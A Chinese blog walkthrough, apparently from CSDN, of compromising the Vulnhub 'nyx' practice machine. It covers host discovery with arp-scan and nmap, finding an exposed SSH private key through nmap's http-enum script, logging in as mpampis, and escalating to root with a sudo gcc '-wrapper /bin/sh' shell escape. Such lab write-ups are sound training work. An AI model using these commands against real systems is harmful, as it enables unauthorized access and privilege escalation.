Vulnhub nyx靶机渗透记录

环境配置

nyx靶机镜像地址:http://www.vulnhub.com/entry/nyx-1,535/
Kali Linux IP: 192.168.1.128
nyx IP:192.168.1.137

信息收集

  • 利用arp-scan,扫描本地局域网主机:
arp-scan -l

扫描出现新的局域网存活主机

  • 利用nmap常规扫描目标主机:
nmap -A -p- 192.168.1.137

开放两个端口

  • 利用dirb对站点目录进行枚举:
dirb http://192.168.1.137

没有找到有价值的页面
然而并没有找到有价值的界面,尝试访问http://192.168.1.137
没有任何线索
没有任何有用的线索,对ssh进行暴力破解没有结果。

  • 查了nmap的高级用法,利用nmap的http-enum脚本对80端口再次扫描:
nmap -p80 --script=http-enum 192.168.1.137

发现可疑文件
发现可疑站点:http://192.168.1.137/d41d8cd98f00b204e9800998ecf8427e.php
站点标题为:mpampis key
ssh私钥

漏洞利用

  • 信息收集所得,看起来是mpampis用户的ssh私钥,尝试ssh免密登录:
    创建私钥文件,复制数据保存,并修改权限:
touch id_rsa
gedit id_rsa

创建私钥文件

chmod 600 id_rsa

修改私钥文件权限

  • 尝试使用私钥免密登录:
ssh -i id_rsa mpampis@192.168.1.137

getshell
成功getshell!!
在当前用户目录下找到user.txt:
user.txt

权限提升

  • 运行sudo -l 查看用户权限:
sudo -l

sudo
发现有一个gcc的特权,到站点:https://gtfobins.github.io/ 查询是否有可用提权方法。

sudo gcc

sudo gcc -wrapper /bin/sh,-s .

提权成功:
root

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值